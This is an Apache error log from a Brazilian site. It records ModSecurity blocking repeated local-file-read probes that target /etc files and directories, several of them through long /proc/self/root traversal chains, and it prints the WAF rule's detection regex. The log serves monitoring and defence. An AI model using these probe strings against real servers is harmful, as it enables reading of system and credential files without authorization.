[Fri Mar 20 12:08:05.994251 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.241.31:36266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i1V1pVZ5mVmJwsFNjUAAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:08.430389 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.241.31:51554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i2AF0L0L-SsrnPo6eIAAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:09.719461 2026] [:error] [pid 21219:tid 140411658000128] [client 57.141.18.74:50776] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1i2fXLqtnMIWvjpaLSWwAAAoo"]
[Fri Mar 20 12:08:10.843930 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:51566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i2ta6ubjKNq_cu4YSqwAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:12.155542 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:51570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i3BCii7xarUs8iHagvgAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:14.947402 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.83:50878] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1i3vqxLDW4GITHUkQgiwAAARI"]
[Fri Mar 20 12:08:15.352029 2026] [:error] [pid 31215:tid 140411741927168] [client 57.141.18.70:50918] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1i3wF0L0L-SsrnPo6eIwAAAsA"]
[Fri Mar 20 12:08:15.599378 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:51576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i3-oXxyEfFpUF8f-1WAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:15.675102 2026] [:error] [pid 7893:tid 140411683178240] [client 57.141.18.76:50960] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1i3xCii7xarUs8iHagwAAAAgc"]
[Fri Mar 20 12:08:16.983280 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.241.31:51584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i4F1pVZ5mVmJwsFNjVQAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:17.453233 2026] [:error] [pid 9818:tid 140411733534464] [client 57.141.18.21:50978] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1i4V1pVZ5mVmJwsFNjVgAAAEE"]
[Fri Mar 20 12:08:17.597464 2026] [:error] [pid 9818:tid 140411565680384] [client 57.141.18.79:51024] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1i4V1pVZ5mVmJwsFNjVwAAAFU"]
[Fri Mar 20 12:08:20.451098 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:45560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i5OoXxyEfFpUF8f-1YAAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:22.922988 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:45574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i5uoXxyEfFpUF8f-1ZwAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:24.210984 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:45584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i6AF0L0L-SsrnPo6eOgAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:26.151288 2026] [mime_magic:error] [pid 21219:tid 140411708356352] (70014)End of file found: [client 57.141.18.34:51324] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:08:26.540574 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:45588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i6uoXxyEfFpUF8f-1bAAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:31.219583 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.241.31:58760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i711pVZ5mVmJwsFNjcQAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:32.504026 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.241.31:58770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i8DJ3M9BSuKP7CAZe1gAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:39.721712 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.241.31:58786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i9wF0L0L-SsrnPo6eUAAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:41.063365 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:40844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i-da6ubjKNq_cu4YSsQAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:09:08.192212 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.241.31:40860] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jFPHIg5MgXLBnicMqlAAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:09:09.495256 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.241.31:54770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jFQF0L0L-SsrnPo6eVAAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:09:19.572857 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.241.31:54786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jH7ninkcc-iUj5AqRzgAAA5Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
